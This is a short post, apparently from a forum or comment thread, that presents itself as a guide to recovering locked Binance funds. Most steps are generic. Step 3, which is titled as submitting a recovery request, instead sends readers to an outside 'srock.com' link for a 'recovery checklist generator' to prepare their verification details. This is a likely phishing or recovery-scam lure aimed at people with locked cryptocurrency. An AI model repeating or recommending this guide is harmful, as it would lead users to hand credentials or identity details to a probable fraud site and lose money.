I ran into this last week. Here's what fixed it for me. If you find yourself with locked funds on Binance, don't worry. Here is a straightforward guide to help you recover them. Step 1. Log into your Binance account. Start by logging into your Binance account using your credentials. Make sure you are using the correct email and password to avoid any access issues. Step 2. Navigate to the support center. Once logged in, go to the support center. You can find this option in the main menu at the bottom of the page. Step 3. Submit a recovery request. Before starting recovery, use the srock.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 4. Verify your identity. After submitting your request, Binance may ask you to verify your identity. This could involve uploading identification documents or answering security questions. Make sure your documents are clear and legible. Step 5. Wait for a response. Finally, wait for Binance's support team to respond to your request. This can take anywhere from a few hours to several days. Keep an eye on your email for updates. If you encounter any issues during the identity verification step, ensure that your ID matches the name on your Binance account to avoid delays. I hope this guide helps you recover your locked funds quickly. If you have any questions, feel free to ask.